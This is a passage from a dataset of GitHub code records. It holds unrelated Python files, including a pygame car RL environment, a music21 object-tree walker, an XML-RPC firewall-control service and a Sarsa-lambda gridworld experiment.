self.car.finish:\n reward = -10000 + self.car.distance - (self.car.time/8) + 2000\n return reward\n\n def finished(self):\n if not self.car.alive or self.car.finish:\n self.car.checkPoint = 0\n self.car.distance = 0\n return True\n return False\n\n def observe(self):\n # return state\n eyes = self.car.eyes\n ret = [0, 0, 0, 0, 0]\n i = 0\n for r in eyes:\n ret[i] = int(r[1] / 20)\n i += 1\n\n return ret\n\n def view(self):\n # draw game\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n self.screen.blit(self.background, (0,0))\n self.screen.blit(self.track, (0,0))\n\n\n if self.mode == 1:\n self.screen.fill((0, 0, 0))\n\n self.car.eyes.clear()\n self.car.backEyes.clear()\n for d in range(-90, 105, 15):\n self.car.checkEyes(d)\n self.car.checkBackEyes(d)\n pygame.draw.circle(self.screen, (255 ,215 ,0), checkPoints[self.car.checkPoint], 15)\n text = self.font.render(str(checkPoints.index(checkPoints[self.car.checkPoint])+1), True, (0, 0, 0))\n textRect = text.get_rect()\n textRect.center = (checkPoints[self.car.checkPoint])\n self.screen.blit(text, textRect)\n self.car.drawEyes(self.screen)\n self.car.draw(self.screen)\n\n pygame.display.flip()\n self.clock.tick(self.game_speed)\n","repo_name":"NewtonYuan/CarAI","sub_path":"game/envs/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1307196735","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = []\ny = []\nz = []\ndata = []\n\nkey_names = ['step', 'age', 'mass', 'luminosity', 'radius', 'T_surface', 'T_central', 'density', 'pressure', 'central_electron_degeneracy', 'hydrogen_fraction', 'helium_fraction', 'carbon_fraction', 'nitrogen_fraction', 'oxygen_fraction', 'time_dyn', 'time_KH', 'time_nuc', 'L_pp', 'L_CNO', 'L_3alpha', 'L_z', 'L_v', 'M_He', 'M_C', 'M_O', 'R_He', 'R_C', 'R_O']\n\nwith open('exercise10_4/summary.txt','r') as txtfile:\n lines = txtfile.readlines()\n for row in lines:\n values = []\n raw_values = row.split()\n for v in raw_values:\n values.append(float(v))\n data.append(dict(zip(key_names, values)))\n \n\nprint(data[0])\n\nfor d in data:\n x.append(d['step'])\n y.append(d['age'])\n\nfig, ax = plt.subplots()\n\nax.plot(x,y, '.')\n#ax.plot(x,z, '-')\n#ax.set_xlabel('step')\n#ax.set_ylabel('radius')\n\n#plt.title('Closest Stars')\n#plt.xticks(np.arange(-0.3, 2, 0.2))\n#plt.yticks(np.arange(-10, 20, 5))\n\nplt.show()\n","repo_name":"LenaMesserschmidt/astro-gk","sub_path":"exercise10_4/stellar_evolution.py","file_name":"stellar_evolution.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16083194488","text":"import sql_connect as sqlcon\nimport employees_dpt_1 as ed\nimport ne04j_connect as neo\n\n\ndef new_manager ():\n while True:\n # temp folders to append any edi/ did that exists in the database. For checking if they exist. \n temp_eid = []\n temp_did = []\n\n # eid is new_data[0] and did is new_data[1]\n new_data = []\n\n print(\"\\nEnter (q) to Quit\")\n \n # Requesting EID input. \n new_data.append(input(\"\\nEnter EID: \").upper())\n \n \n if new_data[0] == \"Q\":\n ed.imp_main()\n\n # Requesting DID input\n new_data.append(input(\"Enter DID: \").upper())\n\n # Getting the EIDs that exist in database. \n all_eid = sqlcon.get_eid()\n\n # Getting the DIDs that exist in database. \n all_did = sqlcon.get_did()\n\n # appending existing EIDs to eid temp folder.\n for i in all_eid:\n temp_eid.append(i[\"EID\"])\n\n # appending existing DIDs to did temp folder.\n for i in all_did:\n temp_did.append(i[\"DID\"])\n\n # If both eid and did exist in database, continue to assign new manager. \n if new_data[0] in temp_eid and new_data[1] in temp_did:\n\n # Checking if department has a manager assigned on Neo4j. \n relationship = neo.read_trans(neo.get_dpt_relationship, new_data[1])\n\n # If the lenght of relationship is 2, then did is already assigned to an employee. \n if len(relationship) == 2:\n print (\"\\nDepartment {} is already managed by Employee {}\".format(relationship[0], relationship[1]))\n \n # Otherwise no manager assigned, so proceed to assign the manager to the department. \n else:\n neo.write_function(neo.new_manager,new_data)\n print(\"\\nEmployee {} now manages Department {}\".format(new_data[0], new_data[1]))\n\n # if the inputted eid is not in the temp folder, notify the user and loop back around. \n if new_data[0] not in temp_eid:\n print(\"\\nEmployee {} does not exist\".format(new_data[0]))\n\n # if the inputted eid is not in the temp folder, notify the user and loop back around. \n if new_data[1] not in temp_did:\n print (\"\\nDepartment {} does not exist\\n\".format(new_data[1]))\n ","repo_name":"RYANCOX00/employees","sub_path":"add_manager_6.py","file_name":"add_manager_6.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71207541033","text":"import time\nfrom unittest import IsolatedAsyncioTestCase\n\nimport async_itertools\n\n\nclass TestAsAsync(IsolatedAsyncioTestCase):\n\n async def test_without_interval(self):\n nums = list(range(10))\n self.assertEqual(nums, [item async for item in async_itertools.as_async(nums)])\n assert nums == [item async for item in async_itertools.as_async(set(nums))]\n assert nums == [item async for item in async_itertools.as_async(num for num in nums)]\n\n async def test_with_interval(self):\n nums = list(range(5))\n start = time.time()\n assert nums == [item async for item in async_itertools.as_async(nums, 0.01)]\n duration = time.time() - start\n self.assertGreater(duration, 0.05)\n","repo_name":"gszxy/async-itertools","sub_path":"tests/test_wrapping/test_as_async.py","file_name":"test_as_async.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14208242966","text":"from __future__ import annotations\n\nimport weakref\n\nimport music21\n\nclass TreeYielder: # pragma: no cover\n def __init__(self, yieldValue=None):\n '''\n `yieldValue` should be a lambda function that\n returns True/False or a function/method call that\n will be passed the value of a current attribute\n '''\n self.currentStack = []\n self.memo = None\n self.yieldValue = yieldValue\n self.stackVals = []\n self.nonIterables = [int, str, # t.LongType,\n float, type(None), bool]\n\n def run(self, obj, memo=None):\n '''\n traverse all attributes of an object looking\n for subObjects that meet a certain criteria.\n yield them.\n\n `memo` is a dictionary to keep track of objects\n that have already been seen\n\n The original object is added to the memo and\n also checked for yieldValue\n '''\n if memo is None:\n memo = {}\n self.memo = memo\n if id(obj) in self.memo:\n self.memo[id(obj)] += 1\n return\n else:\n self.memo[id(obj)] = 1\n\n if self.yieldValue(obj) is True:\n yield obj\n\n # now check for sub values...\n self.currentStack.append(obj)\n\n tObj = type(obj)\n if tObj in self.nonIterables:\n pass\n elif tObj == dict:\n for keyX in obj:\n dictTuple = ('dict', keyX)\n self.stackVals.append(dictTuple)\n x = obj[keyX]\n for z in self.run(x, memo=memo):\n yield z\n self.stackVals.pop()\n\n elif tObj in [list, tuple]:\n for i, x in enumerate(obj):\n listTuple = ('listLike', i)\n self.stackVals.append(listTuple)\n for z in self.run(x, memo=memo):\n yield z\n self.stackVals.pop()\n\n else: # objects or uncaught types...\n # from http://bugs.python.org/file18699/static.py\n try:\n instance_dict = object.__getattribute__(obj, '__dict__')\n except AttributeError:\n # probably uncaught static object\n return\n\n for x in instance_dict:\n # noinspection PyBroadException\n try:\n gotValue = object.__getattribute__(obj, x)\n except Exception: # pylint: disable=broad-exception-caught\n continue\n objTuple = ('getattr', x)\n self.stackVals.append(objTuple)\n try:\n for z in self.run(gotValue, memo=memo):\n yield z\n except RuntimeError:\n raise ValueError(f'Maximum recursion on:\\n{self.currentLevel()}')\n self.stackVals.pop()\n\n self.currentStack.pop()\n\n def currentLevel(self):\n currentStr = ''\n for stackType, stackValue in self.stackVals:\n if stackType == 'dict':\n if isinstance(stackValue, str):\n currentStr += \"['\" + stackValue + \"']\"\n else: # numeric key...\n currentStr += '[' + str(stackValue) + ']'\n elif stackType == 'listLike':\n currentStr += '[' + str(stackValue) + ']'\n elif stackType == 'getattr':\n currentStr += \".__getattribute__('\" + stackValue + \"')\"\n else:\n raise ValueError(f'Cannot get attribute for stackType {stackType!r}')\n return currentStr\n\n\ndef testCode(): # pragma: no cover\n class Mock:\n def __init__(self, mockThing, embedMock=True):\n self.abby = 30\n self.mocker = mockThing\n self.mockList = [mockThing, mockThing, 40]\n self.embeddedMock = None\n if embedMock is True:\n self.embeddedMock = Mock(mockThing, embedMock=False)\n\n def mockType(x):\n return x.__class__.__name__ == 'Mock'\n\n subList = [100, 60, -2]\n myList = [5, 20, [5, 12, 17], 30,\n {'hello': 10, 'goodbye': 22, 'mock': Mock(subList)}, -20, Mock(subList)]\n myList.append(myList)\n\n ty = TreeYielder(mockType)\n for val in ty.run(myList):\n print(val, ty.currentLevel())\n\n\ndef testMIDIParse(): # pragma: no cover\n from music21 import converter\n from music21 import common\n from music21 import freezeThaw\n\n # a = 'https://github.com/ELVIS-Project/vis/raw/master/test_corpus/prolationum-sanctus.midi'\n # c = converter.parse(a)\n # c = corpus.parse('bwv66.6', forceSource=True)\n # v = freezeThaw.StreamFreezer(c)\n # v.setupSerializationScaffold()\n # return v.writeStr() # returns a string\n\n a = common.getSourceFilePath() / 'midi' / 'testPrimitive' / 'test03.mid'\n\n # a = 'https://github.com/ELVIS-Project/vis/raw/master/test_corpus/prolationum-sanctus.midi'\n c = converter.parse(a)\n v = freezeThaw.StreamFreezer(c)\n v.setupSerializationScaffold()\n\n def mockType(x):\n return isinstance(x, weakref.ReferenceType)\n\n ty = TreeYielder(mockType)\n for val in ty.run(c):\n print(val, ty.currentLevel())\n\n\ndef find_all_exception_classes_in_m21(): # pragma: no cover\n return find_all_classes_by_criteria(\n lambda mm: issubclass(mm, music21.exceptions21.Music21Exception)\n )\n\ndef find_all_non_hashable_m21objects(): # pragma: no cover\n # is a bug if not empty\n def is_unhashable(mm):\n if not issubclass(mm, music21.base.Music21Object):\n return False\n try:\n {mm()}\n except TypeError as te:\n return 'unhashable' in str(te)\n return False\n return find_all_classes_by_criteria(is_unhashable)\n\ndef find_all_non_default_instantiation_m21objects(): # pragma: no cover\n # Lack of default instantiation is not necessarily a bug, but\n # let's try not to have them\n def needs_attributes(mm):\n if not issubclass(mm, music21.base.Music21Object):\n return False\n try:\n mm()\n except TypeError:\n return True\n return False\n return find_all_classes_by_criteria(needs_attributes)\n\n\ndef find_all_classes_by_criteria(criteria): # pragma: no cover\n from collections import deque\n import types\n\n d = deque([music21])\n seen = set()\n matches = set()\n while d:\n m = d.popleft()\n if m in seen:\n continue\n print(m)\n for mm_name in dir(m):\n mm = getattr(m, mm_name)\n if (isinstance(mm, types.ModuleType)\n and mm not in seen\n and 'music21' in getattr(mm, '__file__', '')):\n # noinspection PyTypeChecker\n d.append(mm)\n elif isinstance(mm, type) and mm not in seen and criteria(mm):\n matches.add(mm)\n seen.add(m)\n return matches\n\n\nif __name__ == '__main__':\n pass\n # testCode()\n testMIDIParse()\n","repo_name":"cuthbertLab/music21","sub_path":"music21/test/treeYield.py","file_name":"treeYield.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":1878,"dataset":"github-code","pt":"72"} +{"seq_id":"70482643113","text":"import random\nfrom pages.base_page import BasePage\nfrom locators.page_locators import PageLocators\nfrom selenium.webdriver.common.keys import Keys\n\nclass PromotionPage(BasePage):\n\n def choose_random_promotional_offer(self):\n\n current_url = self.driver.current_url\n\n promotion_area_label = self.element_is_visible(PageLocators.PROMOTION_AREA).get_attribute('innerHTML')\n promotion_button = random.choice(self.elements_are_visible(PageLocators.PROMOTION_BUTTON))\n promotion_button_label = promotion_button.find_element(*PageLocators.PROMOTION_BUTTONS_AREA).get_attribute('innerHTML')\n promotion_button.send_keys(Keys.ENTER)\n \n return current_url, promotion_area_label, promotion_button_label\n\n def choose_installment_offer(self):\n\n current_url = self.driver.current_url\n \n phone_model = self.element_is_visible(PageLocators.PHONE_MODEL_AREA).get_attribute('innerHTML')\n installment_list = self.element_is_visible(PageLocators.INSTALLMENT_LIST)\n installment_list.click()\n installment_plan = self.driver.find_element(*PageLocators.INSTALLMENT_PLAN)\n installment_plan_id = installment_plan.get_property('value')\n installment_plan_duration = installment_plan.get_attribute('innerHTML').strip().replace(' ', ' ')\n installment_plan_details = installment_plan.get_attribute('data-note').replace('
', '\\n')\n self.driver.find_element(PageLocators.INSTALLMENT_PLAN_ID[0], PageLocators.INSTALLMENT_PLAN_ID[1].replace('installment_plan_id', installment_plan_id)).click()\n installment_list.send_keys(Keys.TAB, Keys.ENTER)\n \n return current_url, phone_model, installment_plan_duration, installment_plan_details\n\n def navigate_to_shopping_cart(self):\n\n current_url = self.driver.current_url\n \n return current_url","repo_name":"AMartsinkevich/A1","sub_path":"pytest_test/pages/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8447605189","text":"import sys\nimport core\n\nw = core.geo_data()\ncore.geo_read(sys.argv[1], w)\n\nbb = core.rect_d(37, 55, 0.01, 0.01)\n\nlayer = core.LayerGeoMap(w)\nref = layer.get_ref()\n\nm2p = core.map2pt(ref, core.Datum(\"wgs84\"), core.Proj(\"lonlat\"))\nr = m2p.bb_bck(bb)\n\nim = layer.get_image(r)\ncore.save(im, \"out.jpg\", {})\n","repo_name":"ushakov/mapsoft","sub_path":"core/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"6873037988","text":"import numpy as np\nimport gym\nimport gym_gridworld\nimport itertools\nfrom collections import defaultdict\nimport sys\nfrom gym import wrappers\nimport dill\nimport CreateMovie as movie\nimport os\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\npklfiles = ['SL_PuddleAQ500.pkl', 'SL_PuddleBQ500.pkl', 'SL_PuddleCQ500.pkl']\nmapFiles = [\"map1.txt\", \"map2.txt\", \"map3.txt\"]\nfiguretitle = ['Sarsa lambda Puddle World Problem A',\n 'Sarsa lambda Puddle World Problem B', 'Sarsa lambda Puddle World Problem C']\nplotsave = ['SL_Avg_steps_A_', 'SL_Avg_steps_B_', 'SL_Avg_steps_C_']\nproblemis = [\"A\", \"B\", \"C\"]\nmoviefilename = [\"SL_movieA\", \"SL_movieB\", \"SL_movieC\"]\n\n\ndef plot_avg_steps(num_episodes, avg_steps, slambda):\n x = np.arange(num_episodes)\n plt.clf()\n plt.plot(x, avg_steps)\n plt.title(\"Sarsa lambda Average number of steps to goal for problem \" +\n problemis[grids]+\" lambda \"+str(slambda))\n plt.xlabel(\"Episodes\")\n plt.ylabel(\"Average number of steps\")\n plt.xlim((0, num_episodes))\n plt.savefig(\"SL_Avg_steps_\"+problemis[grids]+\"_lambda_\"+str(slambda) +\n str(num_episodes)+'.png', dpi=300)\n # plt.show()\n\ndef plot_total_return(num_episodes, total_return, slambda):\n x = np.arange(num_episodes)\n plt.clf()\n plt.plot(x, total_return)\n plt.title(\"Sarsa lambda Average Return per episode for problem \" +\n problemis[grids]+\" lambda \"+str(slambda))\n plt.xlabel(\"Episodes\")\n plt.ylabel(\"Average Return\")\n plt.xlim((0, num_episodes))\n plt.savefig(\"SL_return_\"+problemis[grids]+\"_lambda_\"+str(slambda) +\n str(num_episodes)+'.png', dpi=300)\n # plt.show()\n\n# find optimal policy\ndef find_optimal_policy(Q):\n optimal_policy = defaultdict(lambda: np.zeros(1))\n for k, v in Q.items():\n if np.allclose(v, v[0]):\n optimal_policy[k] = 1\n # optimal_policy[k] = np.random.choice(4, 1, p=[0.25, 0.25, 0.25, 0.25])[0]\n else:\n optimal_policy[k] = np.argmax(v)\n return optimal_policy\n\n# Simulate on learned optimal policy\ndef Simulate_sarsa(optimal_policy, num_episodes=10):\n figcount = 0\n env.saveFile = ENABLE_RECORDING\n\n for i in range(num_episodes):\n dis_return = 0\n observation = env.reset()\n\n for i in itertools.count():\n\n a = int(optimal_policy[observation])\n next_observation, reward, done, _ = env.step(a)\n\n env.steps = i\n dis_return += reward\n env.dis_return = dis_return\n\n if ENABLE_RENDERING:\n env.render(mode='human')\n env.figurecount = figcount\n figcount += 1\n\n if done:\n env.dis_return = 0\n env.steps = 0\n break\n\n observation = next_observation\n\n# Creates epsilon greedy policy\ndef epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n\n # Taking random action if all are same\n if np.allclose(Q[observation], Q[observation][0]):\n best_action = np.random.choice(\n 4, 1, p=[0.25, 0.25, 0.25, 0.25])[0]\n else:\n best_action = np.argmax(Q[observation])\n\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn\n\n# Sarsa lambda algorithm implementation\ndef sarsa_lambda(env, num_episodes=1000, iterations=50, gamma=0.9, slambda=0.1, alpha=0.1, epsilon=0.1):\n env.reset()\n Q = defaultdict(lambda: np.zeros(env.n_actions)) \n et = defaultdict(lambda: np.zeros(env.n_actions))\n\n\n for itr in range(iterations):\n number_of_steps = np.zeros(num_episodes)\n total_return = np.zeros(num_episodes) \n Q.clear()\n et.clear()\n\n policy = epsilon_greedy_policy(Q, epsilon, env.n_actions)\n figcount = 0\n\n for i_episode in range(num_episodes):\n dis_return = 0\n\n if (i_episode + 1) % 100 == 0:\n print(\"\\nIteration: {} Episode {}/{}.\".format(itr,\n i_episode + 1, num_episodes))\n\n # Reset the environment and pick the first action\n observation = env.reset()\n action_prob = policy(observation)\n a = np.random.choice(\n [i for i in range(len(action_prob))], p=action_prob)\n\n for i in itertools.count(): # Till the end of episode\n # TAKE A STEP\n next_observation, reward, done, _ = env.step(a)\n\n env.steps = i\n dis_return += reward # Updating return\n env.dis_return = dis_return\n\n if ENABLE_RENDERING: # Rendering\n env.render(mode='human')\n env.figurecount = figcount\n figcount += 1\n\n \n next_action_probs = policy(next_observation)\n next_action = np.random.choice(\n np.arange(len(next_action_probs)), p=next_action_probs) # Next action\n TDError = reward + gamma * \\\n Q[next_observation][next_action] - Q[observation][a] # TD Error\n et[observation][a] += 1 # Accumulating traces\n\n for k, _ in Q.items():\n for actions in range(4):\n Q[k][actions] += alpha*TDError*et[k][actions] # Sarsa lambda Q update\n et[k][actions] = gamma*slambda*et[k][actions] # Elegibility trace update\n\n if done:\n # print(\"Total discounted return is :\", dis_return)\n env.dis_return = 0\n env.steps = 0\n break\n\n observation = next_observation\n a = next_action\n # print(\"Total steps taken is :\", i)\n number_of_steps[i_episode] = i # Updating Number of steps\n total_return[i_episode] = dis_return # Updating return\n\n np.save('SL_saves/SL_avg_num_of_steps_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(slambda)+\"_itr_\"+str(itr), number_of_steps)\n np.save('SL_saves/SL_total_return_per_episode_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(slambda)+\"_itr_\"+str(itr), total_return)\n\n return Q\n\nfor grids in range(3):\n\n env = gym.make(\"GridWorld-v0\")\n filename = pklfiles[grids]\n ENABLE_RECORDING = False\n ENABLE_RENDERING = False\n env.saveFile = ENABLE_RECORDING\n env.mapFile = mapFiles[grids]\n\n if problemis[grids] == \"C\":\n env.westerly_wind = False\n\n num_episodes = 30\n iterations = 25\n\n env.reset()\n env.first_time = False\n\n sarsa_lambda_values = [0, 0.3, 0.5, 0.9, 0.99, 1.0]\n\n for l in range(len(sarsa_lambda_values)):\n env.figtitle = figuretitle[grids]+\" lambda \"+str(sarsa_lambda_values[l])\n \n\n Q = sarsa_lambda(env, num_episodes=num_episodes, iterations=iterations,\n gamma=0.9, slambda=sarsa_lambda_values[l] ,alpha=0.1, epsilon=0.1)\n\n if ENABLE_RECORDING:\n movie.CreateMovie(moviefilename[grids], 5)\n\n # Plotting\n avg_number_of_steps = np.zeros(num_episodes)\n total_return_per_episode = np.zeros(num_episodes)\n\n for i in range(iterations):\n avg_number_of_steps += np.load('SL_saves/SL_avg_num_of_steps_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l])+\"_itr_\"+str(i)+\".npy\")\n total_return_per_episode += np.load('SL_saves/SL_total_return_per_episode_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l])+\"_itr_\"+str(i)+\".npy\")\n\n avg_number_of_steps /= iterations\n total_return_per_episode /= iterations\n np.save('SL_saves/SL_avg_num_of_steps_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l]), avg_number_of_steps)\n np.save('SL_saves/SL_total_return_per_episode_for_problem_' +\n problemis[grids]+\"_lambda_\"+str(sarsa_lambda_values[l]), total_return_per_episode)\n\n # plot_avg_steps(num_episodes, avg_number_of_steps,\n # sarsa_lambda_values[l])\n # plot_total_return(\n # num_episodes, total_return_per_episode, sarsa_lambda_values[l])\n\n # Finding optimal policy based on Q\n optimal_policy = find_optimal_policy(Q)\n env.optimal_policy = optimal_policy\n\n # Drawing arrows of optimal policy\n env.draw_arrows = True\n env.render(mode='human')\n\n # # For recording video of simulation\n # env.draw_arrows = False\n ENABLE_RENDERING = True\n ENABLE_RECORDING = True\n\n if ENABLE_RECORDING:\n Simulate_sarsa(optimal_policy, 5)\n movie.CreateMovie(\n moviefilename[grids]+\"_lambda_\"+str(sarsa_lambda_values[l]), 5)\n\n# Plotting all 3 problems graph togeather\nimport Sarsa_lambda_plot\n","repo_name":"niravnb/Reinforcement-learning","sub_path":"Q Learning, Sarsa and Policy Gradients/Code/Q1_Q_learning_Sarsa/Sarsa_lambda.py","file_name":"Sarsa_lambda.py","file_ext":"py","file_size_in_byte":9083,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"337131450","text":"import h5py\nimport numpy as np\nfrom global_functions import create_waits_csv\n\n\ndef attach_time_scale(file, path, dummy_data, dtype):\n \"\"\" create a dataset to store the storage times of the data and then add it as a dimension scale to the actual\n datasets\n\n :param file: the HDF5 file in which the dataset is to be stored (HDF5 file)\n :param path: the path to the actual datasets (string)\n :param dummy_data: storage times for initializing the dataset, so that further values can be added to it\n later on (numpy array with d_type 'S26')\n :param dtype: the data type of the dummy data (numpy dtype)\n \"\"\"\n dset_time = file.create_dataset(f'{path}_times', data=dummy_data, maxshape=(None,), dtype=dtype,\n chunks=True)\n dset_time.make_scale('storage_time')\n dset_content = file[path]\n dset_content.dims[0].attach_scale(dset_time)\n\n\ndef attach_metadata_rides(ride_name, topic_area, dset, source):\n \"\"\" generate metadata for a ride and attach the metadata to the corresponding dataset\n\n :param ride_name: the name of the ride (string)\n :param topic_area: the topic area the ride belongs to (string)\n :param dset: the HDF5 dataset of the corresponding ride (HDF5 dataset)\n :param source: the website where the data is taken from (string)\n \"\"\"\n if source == 'q_times':\n website = 'www.queue-times.com'\n else:\n website = 'www.queue-park.com'\n attrs_dict = {'name_ride': ride_name, 'name_park': 'Disneyland Paris', 'topic_area': topic_area,\n 'units_waiting_time': 'min', 'time_delta': '1', 'time_units': 'min', 'source': website,\n 'missing_values': -1}\n for attr in attrs_dict:\n dset.attrs[attr] = attrs_dict[attr]\n\n # add an attribute indicating the number of data points that are dummy data\n dset.attrs['dummy_data_to_delete'] = dset.shape\n\n\ndef attach_metadata_weather(time_frame, file, path):\n \"\"\" generate metadata for a weather forecast and attach the metadata to the corresponding dataset\n\n :param path: the path to the weather forecast dataset (string)\n :param file: the HDF5 file in which the weather forecast dataset is stored (HDF5 file)\n :param time_frame: the time frame of the forecast (today, tomorrow or next week; string)\n \"\"\"\n dset = file[path]\n if time_frame == 'next_week':\n time_delta = 8 # the values correspond to time windows of 8 hours\n else:\n time_delta = 1 # the values correspond to time windows of 1 hour\n attrs_dict_weather = {'location': 'paris', 'time_delta': time_delta, 'time_units': 'hours',\n 'source': 'www.weather-forecast.com', 'unit_temp': '°C',\n 'unit_prec': 'mm', 'unit_wind_speed': 'km/h', 'unit_humidity': 'percent',\n 'unit_felt_temp': '°C', 'description': f'weather forecast collected for {time_frame}',\n 'dummy_data_to_delete': dset.shape, 'missing_values': -111}\n for name in attrs_dict_weather:\n dset.attrs[name] = attrs_dict_weather[name]\n\n\ndef create_hdf5_file(name, mode):\n \"\"\" create a HDF5 file with the specified name, create groups for the rides and weather forecasts and\n add corresponding records\n\n :param name: the name of the HDF5 file (string)\n :param mode: the mode in which the file should be opened (string)\n \"\"\"\n # create file\n f = h5py.File(f'{name}.hdf5', mode)\n\n # data model for the rides\n\n # indicate which rides were selected\n # five rides that had the highest wait times on average according to the Queue Times website in 2022 were selected\n rides = {'princess_pavilion': ['Princess Pavilion', 'Fantasyland'],\n 'meet_mickey': ['Meet Mickey Mouse', 'Fantasyland'],\n 'peter_pans_flight': ['Peter Pan\\'s Flight', 'Fantasyland'],\n 'big_thunder_mountain': ['Big Thunder Mountain', 'Frontierland'],\n 'orbitron': ['Orbitron®', 'Fantasyland']}\n websites = ['q_times', 'q_park'] # the two website sources\n\n # create dummy data to initialize the datasets and to be able to append to it\n dummy_waits = np.repeat(-1, 2)\n dt_storage_time = np.dtype('S26') # since the ISO-format of timestamps is of length 26\n dummy_timestamps = np.array(['1800-01-01T00:00:00.000000', '1800-01-02T00:00:00.000000'], dtype=dt_storage_time)\n\n # create for each ride two datasets (one per website)\n for ride in rides.keys():\n for site in websites:\n path_dset = f'/rides/{ride}/{site}'\n\n # chunked storage is necessary to be able to resize the dataset\n dset_ride = f.create_dataset(path_dset, data=dummy_waits, maxshape=(None,), dtype='int16', chunks=True)\n\n # add metadata to the datasets\n attach_metadata_rides(rides[ride][0], rides[ride][1], dset_ride, site)\n\n # attach a dataset that holds storage times as dimension scale to the ride datasets\n attach_time_scale(f, path_dset, dummy_timestamps, dt_storage_time)\n\n # data model for temperature forecasts\n\n # define a compound data type for the weather data (the columns are in the same order as in the table on the website\n # to facilitate data retrieval and storage)\n dt_day = np.dtype([('wind_speed', np.int16), ('precipitation', np.float16), ('temp', np.int16),\n ('felt_temp', np.int16), ('humidity', np.int16)])\n\n dt_next_week = np.dtype([('wind_speed', np.int16), ('precipitation', np.float16), ('highest_temp', np.int16),\n ('lowest_temp', np.int16), ('felt_temp', np.int16), ('humidity', np.int16)])\n\n # create dummy temperature data with the same shape as the final datasets\n dummy_day = np.repeat(-99, 48).reshape(2, 24) # 24 measurements per day (1 per hour)\n dummy_day = np.array(dummy_day, dtype=dt_day)\n dummy_next_week = np.repeat(-99, 6).reshape(2, 3) # 3 measurements per day (1 every 8 hours)\n dummy_next_week = np.array(dummy_next_week, dtype=dt_next_week)\n\n # create datasets for the weather forecasts (for today, tomorrow and next week)\n time_frames = ['today', 'tomorrow']\n for frame in time_frames:\n f.create_dataset(f'/weather/{frame}', data=dummy_day, maxshape=(None, 24), dtype=dt_day, chunks=True)\n f.create_dataset(f'weather/next_week', data=dummy_next_week, maxshape=(None, 3), dtype=dt_next_week, chunks=True)\n\n # add the storage time as a dimension scale to the weather datasets and attach metadata\n time_frames.append('next_week')\n for frame in time_frames:\n path_dset = f'weather/{frame}'\n attach_time_scale(f, path_dset, dummy_timestamps, dt_storage_time)\n attach_metadata_weather(frame, f, path_dset)\n\n # close the HDF5 file\n f.close()\n\n\nif __name__ == '__main__':\n # create the hdf5 file with the specified data model\n create_hdf5_file('disneyland', 'w')\n\n # create the csv file for aggregating wait times before storing them in the HDF5 file\n create_waits_csv('waits_q_times.csv')\n create_waits_csv('waits_q_park.csv')\n","repo_name":"StephanieHochge/Web-Scraping-Disneyland","sub_path":"hdf5_data_model.py","file_name":"hdf5_data_model.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14704095960","text":"import subprocess\nimport configparser\nimport time\nfrom xmlrpc.server import SimpleXMLRPCServer\nfrom xmlrpc.server import SimpleXMLRPCRequestHandler\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\n\nclass RequestHandler(SimpleXMLRPCRequestHandler):\n rpc_paths = ('/RPC2',)\n\nwith SimpleXMLRPCServer(('0.0.0.0', int(config['xml_api']['port'])),\n requestHandler=RequestHandler) as server:\n server.register_introspection_functions()\n\n # Trigger a firewall restart\n def reload_firewall():\n subprocess.run(['./fw_setup.py'])\n return True\n server.register_function(reload_firewall,'reload')\n\n # Activate User\n def add_time_restricted_access(mac_address, minutes):\n end_time = int(time.time()) + int(minutes) * 60\n file_object = open(config['xml_api']['activated_macs_file'], 'a')\n file_object.write(str(mac_address) + \" \" + str(end_time) + \"\\n\")\n file_object.close()\n return True\n server.register_function(add_time_restricted_access,'activate')\n\n # Clear List of Activated Users\n def clear_activated_users():\n file_object = open(config['xml_api']['activated_macs_file'], 'w')\n file_object.close()\n return True\n server.register_function(clear_activated_users,'clear_activations')\n\n # Renew blocked ips\n def set_blocked_targets(addresses):\n target_list = addresses.split()\n file_object = open(config['xml_api']['blocked_targets_file'], 'w')\n for ip in target_list:\n file_object.write(ip + \"\\n\")\n file_object.close()\n return True\n server.register_function(set_blocked_targets, 'block')\n\n # Run the server\n server.serve_forever()\n","repo_name":"camelusferus/cpob","sub_path":"xmlrpcapi.py","file_name":"xmlrpcapi.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"759119913","text":"# #내가 푼 정답\n# def solution(N, stages):\n# stay = [0] * (N+1)\n# result = []\n# for stage in stages:\n# stay[stage-1] += 1\n# for i in range(len(stay)):\n# if stay[i] == 0:\n# result.append([i+1, 0])\n# else:\n# result.append([i+1, stay[i]/sum(stay[i:])])\n# result.pop()\n# result.sort(key = lambda x : (-x[1], x[0]))\n# print([x[0] for x in 